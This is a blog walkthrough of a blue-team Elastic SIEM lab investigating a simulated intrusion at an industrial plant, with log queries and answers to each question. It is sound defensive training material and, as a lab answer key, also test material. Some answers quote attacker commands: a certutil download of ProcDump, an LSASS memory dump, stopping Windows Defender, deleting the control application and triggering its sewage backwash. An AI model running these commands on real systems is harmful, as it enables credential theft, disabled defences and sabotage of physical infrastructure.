Eugene Moore

/home

/posts

/about

HafinumAPT Blue Team Lab

Elastic SIEM lab. Level: Difficult

- 10 min

Scenario:

You work as a soc analyst for a consulting firm that specializes in digital forensics and incident response. You are assigned to investigate a security incident that occurred at a manufacturing plant that produces electronic components.

Q1. What is the name of the threat detected by Windows Defender?

  • Since this question already specifies the provider’s name, we can filter the results using the following field:
winlog.provider_name: "Microsoft-Windows-Windows Defender"
  • With the results filtered to only include Windows Defender logs, we can search for all the possible threats logged by Windows Defender using this field:
winlog.event_data.Threat Name

There is only one result, and that is the answer to this question.

images

Answer: Trojan:Win32/Ceprolad.A

Q2. What was the full URL that Windows Defender blocked an archive from being downloaded?

  • Similar to question one, we want to filter only the Windows Defender logs. Knowing the most common Windows Defender Event IDs will help with this question. Since Windows Defender is blocking an archive from being downloaded, we can use Event ID 1117, which logs the action taken against malware or potentially unwanted software. Using the query:

    winlog.provider_name: "Microsoft-Windows-Windows Defender" and winlog.event_id : 1117

  • We get two documents. By reading through the first document and looking at the field winlog.event_data.Path, we find the full URL that was blocked.

images

Answer: https://download.sysinternals.com/files/Procdump.zip

Q3. What was the full command used by the attacker to successfully download the archive?

  • Sysmon usually logs any type of download, especially if it’s from the terminal. We can filter our results using Sysmon as the provider_name. There are a few different ways to find this answer, but if the attacker is using the command line, we can wildcard with http.
winlog.provider_name: "Microsoft-Windows-Sysmon" and winlog.event_data.CommandLine: *http*
  • By looking through the field winlog.event_data.CommandLine, we see the URL that was blocked from Q2 and the full command the attacker used to download the archive. There are two similar commands, but one is unsuccessful. It took me a bit to figure out, but the quotes are missing from one of the commands, which makes it invalid.

images

Answer: certutil.exe -urlcache -split -f “https://download.sysinternals.com/files/Procdump.zip" procdump.zip

Q4. Which user account was the attacker using when the archive was successfully downloaded to the host?

  • By filtering using the answer from Q3, we see that the event_data.User was Administrator.

Answer : Administrator

Q5. What command was used by the attacker on the host to try and disable Windows Defender via the command line?

  • To answer this question, it’s important to keep track of the attacker’s TTPs (Tactics, Techniques, and Procedures). From the previous questions, we know the hostname that the attacker was using, which is PoopController (it’s funny that the author of the lab named it that). By using the hostname, Sysmon, and filtering for events where the parent process is cmd.exe, we can get the answer.
winlog.provider_name: "Microsoft-Windows-Sysmon" and host.name : PoopController and winlog.event_data.ParentImage : *cmd.exe*
  • By viewing the field winlog.event_data.CommandLine, we can see that the attacker used sc stop WinDefend to try and disable Windows Defender.

images

Answer : sc stop WinDefend

Q6. Provide the date and time when Windows Defender’s real-time protection was disabled. (24H-UTC)

  • Using the Event ID 5001(Indicates that real-time protection has been disabled) and Window Defender as the provider name the answer is the only document presented.

Answer : 2021-03-12 08:21:35

Q7. Which version of ProcDump did the attacker run on the host?

  • Using the field winlog.event_data.Image we can search for a executable file and from there get more information about the file.
winlog.provider_name: "Microsoft-Windows-Sysmon" and winlog.event_data.Image : *procdump*

images

Answer : 10.0

Q8. Where is the executable located on the disk that was targeted by Procdump to dump its process memory?

  • In Q7 when searching for procdump, I came across this command: procdump -ma lsass.exe lsass.dmp. Since we see that procdump was targeting lsass, we can use that as a filter:

    winlog.event_data.Image : *lsass.exe*

  • The documents that get returned have the full path of the image, which gives us our answer.

Answer: C:\windows\system32\lsass.exe

Q9. What was the location of the dump file created from the process dumped with Procdump?

  • The previous documents give us a clue for this answer. Procdump was executed from c:\tmp\procdump.exe. Since the command did not specify a different location for the new file, it must be in the same location as Procdump.

Answer: c:\tmp\lsass.dmp

Q10. Provide the SHA256 hash value of the Teamviewer installation to check if the legitimate version was installed.

  • This question can be confusing. Make sure you are checking for the TeamViewer installation executable, which is TeamViewer_Service and not the TeamViewer application. Using the field winlog.event_data.Hashes, the answer is available.

images

Answer : D256F177A3DD8E7346B3FA9D32C4690B611F104E7CE175E99C5757BE6EEF229B

Q11. What was the domain looked up in the first DNS query done by the TeamViewer application after it was installed?

  • Using winlog.event_id:22, which captures DNS queries, and winlog.event_data.Image: TeamViewer, we can solve this answer. For this question, it’s best to get the timestamp for when TeamViewer was installed to narrow down the DNS results, making it much easier to solve.

Answer : router7.teamviewer.com

Q12. Determine how the attacker gained access to the Administrator account.

  • This question can be tricky. Since a common way for an attacker to gain access is through brute force, I checked to see if I could find any clues indicating it was through that method. Windows security logs keep a detailed record of all access attempts on a system, both authorized and unauthorized. Using Windows security logs and Event ID 4625 (Failed logon) is my method to detect a brute force attack, especially if you see multiple failed logins in a short time period.
winlog.channel : "Security" and winlog.event_id : 4625

images

  • After filtering, we can see there were 1004 failed logons in a short period, indicating a brute force attack.

Answer : Brute Force Attack

Q13. What IP address can we send to the Firewall team for blocking?

  • Using the field winlog.event_data.IpAddressess from our results above gives us the attackers IP.

Answer : 8.36.216.58

Q14. What was the hostname from where the attacker launched their attack?

  • Similiar to the last question. Using the field winlog.event_data.WorkstationName gives us the attackers hostname.

Answer : FancyPoodle

Q15. Provide the first timestamp from the logs where you can see the attacker was successful in logging. (24H-UTC)

  • Using the answer from above, we can construct a query to include the hostname, security logs, and Event ID 4624 (Successful logon) to get the answer.
winlog.channel : "Security" and winlog.event_data.WorkstationName: FancyPoodle and winlog.event_id : 4624

Answer : 2021-03-11 20:26:52

Q16. Provide the data in UTC time of when the attacker successfully logged into the host using RDP for the first time. (24H-UTC)

  • When using RDP the security event logs that as Logon Type 10. We can construct this query to find the answer. Since we have more information about the attacker our query can be more specific.
 winlog.channel : "Security" and winlog.event_id : 4624 and winlog.event_data.LogonType: "10" and winlog.event_data.TargetUserName: "Administrator"
  • After just sort the timestamp by old to new and look at the first login.

Answer : 2021-03-12 08:03:00

Q17. When did the attacker log off from the first RDP session? (24H-UTC)

  • Solve this question by narrowing the events using the timestamp above and using the Event ID: 23 (created when a local session logs off).

Answer : 2021-03-12 08:45:02

Q18. What command did the attacker run on the host which would’ve helped him understand what Antivirus software was running on the system?

  • Using the query winlog.event_data.ParentImage and filtering through the command line statements, we can find the command tasklist, which displays a list of running processes. The attacker would use this to see what is currently running on the machine.
winlog.event_data.ParentImage : *cmd.exe*

Answer : TaskList

Q19. Which command did the attacker run on the host that would have helped him understand the network interface configuration of the host?

  • Same as the question above. Looking through all of the statements the command ipconfig /all would let the attacker understand the host network.

Answer : ipconfig /all

Q20. What was the name of the user account added by the attacker?

  • Security event logs log every time a new user is added with Event ID 4720. Using the query:
winlog.channel : "Security" and winlog.event_id : 4720
  • and the field winlog.event_data.TargetUserName, making sure we are within the time range of all the other events, gives us the answer.

Answer : Administrator1

Q21. Based on information from the public, the first visual signs of raw sewage spilling into the river from the plant were around 14:00 local time on March 12th, 2021. According to the plant technicians, it would take at least 45 minutes for the plant to excrete sewage into the river once the backwash mode was activated. A file was created on the system that matches the above timelines and, based on its content, could likely have been used by the attackers to initiate the plant backwash. What was the name of this file?

  • Using Event ID 11 (file was created) and the information we got from previous answers can help us solve this problem. By focusing on the time in the question, you can make a range and then from there, using the field winlog.event_data.TargetFileName, get the answer.
winlog.provider_name: "Microsoft-Windows-Sysmon" and winlog.event_id : "11"

images

Answer : backwash.bat

Q22. Which application was responsible for downloading the malicious file to the host?

  • Filtering the results with the backwash.bat filename, we come across a few documents that most likely have information regarding the application.

images

  • By sorting the timestamp from old to new, we come across the bat file when it was still in the Downloads folder. Looking through the different fields shows us that chrome.exe was the application responsible.

images

Answer : chrome.exe

Q23. From which website was this malicious file downloaded?

  • Still using the same query as above and the field winlog.event_data.Contents, we can find the website from where this file was downloaded.

  • This problem could also be solved using a query that includes Zone transfer. The Zone transfer details can reveal additional context about the DNS interactions that occurred during the download process.

images

Answer : wetransfer.com

Q24. After this file was downloaded, the attacker appeared to have moved it to another directory on the host. What was the new path of the file?

  • To solve this just look at the TargetFilename field using the malware as the value.

Answer : C:\backwash.bat

Q25. Based on the available logs, there are limited indications that the downloaded malicious file was executed on the host. Provide the earliest timestamp which shows proof of the file being executed on the host. (24H-UTC)

  • Looking through the earlier documents, I remember seeing the contents of the malicious file. This is important because knowing the contents of the file, we can use that information for the query.

images

images

Answer : 2021-03-12 11:10:03

Q26. What command contained in the malicious file, if successfully run on the host, would you expect to have initiated the plant’s backwash mode

  • Reading through the content and seeing the parameters: –function backwash –interruptable no would indicate that this command initiated the plant’s backwash mode. The rest of the commands are the attacker trying to cover their tracks by deleting files and terminating the application.

Answer : C:\Program Files\ifak\SIMBA#4.3\Simba.exe –function backwash –interruptable no”

Q27. Prior to switching to a manual override, the technicians attempted to open the modified Simba plant simulation software application in order to stop the backwash sequence. However, they could not get the application to launch. What command from the attacker’s script would have rendered the application unusable?

  • DEL /F /Q “C:\Program Files\ifak\SIMBA#4.3” this command would delete all files in the mentioned directory, force deletion of read-only files, and enable quiet mode, all making the application unusable.

Answer : DEL /F /Q “C:\Program Files\ifak\SIMBA#4.3*”

This lab was quite challenging because it required familiarity with many event IDs and specific fields necessary to find the answers. Additionally, understanding when to use Sysmon logs versus Security Event Logs was crucial. This can be tricky because certain events are only logged by specific providers and channels. Despite the difficulty, it was an enjoyable lab, and I learned a lot from completing it!!